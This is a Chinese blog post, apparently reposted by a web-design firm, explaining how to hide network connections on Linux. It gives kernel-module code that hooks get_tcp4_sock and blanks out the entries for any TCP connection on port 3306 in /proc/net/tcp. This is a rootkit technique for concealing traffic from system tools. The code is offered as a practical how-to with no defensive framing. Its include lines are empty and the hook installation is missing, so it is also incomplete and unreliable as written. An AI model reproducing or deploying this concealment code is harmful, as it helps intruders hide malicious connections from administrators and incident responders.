Linux下怎么隐藏网络连接

本篇内容介绍了“Linux下怎么隐藏网络连接”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!

创新互联专注于陇县网站建设服务及定制,我们拥有丰富的企业做网站经验。 热诚为您提供陇县营销型网站建设,陇县网站制作、陇县网页设计、陇县网站官网定制、小程序制作服务,打造陇县网络公司原创品牌,更为您提供陇县网站排名全网营销落地服务。

直接inline hook住get_tcp4_sock这个函数就行了,只不过需要重新实现下get_tcp4_sock的功能,在作下过滤。比较简单,代码如下:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

__u32 wnps_in_aton(const char *str)
{
unsigned long l;
unsigned int val;
int i;

l = 0;
for (i = 0; i < 4; i++) {
l <<= 8;
if (*str != '\0') {
val = 0;
while (*str != '\0' && *str != '.') {
val *= 10;
val += *str - '0';
str++;
}
l |= val;
if (*str != '\0')
str++;
}
}

return(htonl(l));
}

void new_get_tcp4_sock(struct sock *sk, struct seq_file *f, int i, int *len)
{
int timer_active;
unsigned long timer_expires;
struct tcp_sock *tp = tcp_sk(sk);
const struct inet_connection_sock *icsk = inet_csk(sk);
struct inet_sock *inet = inet_sk(sk);
__be32 dest = inet->daddr;
__be32 src = inet->rcv_saddr;
__u16 destp = ntohs(inet->dport);
__u16 srcp = ntohs(inet->sport);

printk("!! in new_get_tcp4_sock.\n");

if (icsk->icsk_pending == ICSK_TIME_RETRANS) {
timer_active    = 1;
timer_expires   = icsk->icsk_timeout;
} else if (icsk->icsk_pending == ICSK_TIME_PROBE0) {
timer_active    = 4;
timer_expires   = icsk->icsk_timeout;
} else if (timer_pending(&sk->sk_timer)) {
timer_active    = 2;
timer_expires   = sk->sk_timer.expires;
} else {
timer_active    = 0;
timer_expires = jiffies;
}

/*
if (src == wnps_in_aton("127.0.0.1")) {
printk("got 127.0.0.1");
return ;
}
*/
if (srcp == 3306 || destp == 3306) {
printk("got 3306!\n");
seq_printf(f, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X %02X:%08lX "
"%08X %5d %8d %lu %d %p %lu %lu %u %u %d%n",
0, 0, 0, 0, 0, 0,
tp->write_seq - tp->snd_una,
sk->sk_state == TCP_LISTEN ? sk->sk_ack_backlog :
(tp->rcv_nxt - tp->copied_seq),
timer_active,
jiffies_to_clock_t(timer_expires - jiffies),
icsk->icsk_retransmits,
sock_i_uid(sk),
icsk->icsk_probes_out,
sock_i_ino(sk),
atomic_read(&sk->sk_refcnt), sk,
jiffies_to_clock_t(icsk->icsk_rto),
jiffies_to_clock_t(icsk->icsk_ack.ato),
(icsk->icsk_ack.quick << 1) | icsk->icsk_ack.pingpong,
tp->snd_cwnd,
tp->snd_ssthresh >= 0xFFFF ? -1 : tp->snd_ssthresh,
len);

}
else {
seq_printf(f, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X %02X:%08lX "
"%08X %5d %8d %lu %d %p %lu %lu %u %u %d%n",
i, src, srcp, dest, destp, sk->sk_state,
tp->write_seq - tp->snd_una,
sk->sk_state == TCP_LISTEN ? sk->sk_ack_backlog :
(tp->rcv_nxt - tp->copied_seq),
timer_active,
jiffies_to_clock_t(timer_expires - jiffies),
icsk->icsk_retransmits,
sock_i_uid(sk),
icsk->icsk_probes_out,
sock_i_ino(sk),
atomic_read(&sk->sk_refcnt), sk,
jiffies_to_clock_t(icsk->icsk_rto),
jiffies_to_clock_t(icsk->icsk_ack.ato),
(icsk->icsk_ack.quick << 1) | icsk->icsk_ack.pingpong,
tp->snd_cwnd,
tp->snd_ssthresh >= 0xFFFF ? -1 : tp->snd_ssthresh,
len);
}
}

“Linux下怎么隐藏网络连接”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注创新互联网站,小编将为大家输出更多高质量的实用文章!


当前名称:Linux下怎么隐藏网络连接
转载来于:http://ybzwz.com/article/ijgepj.html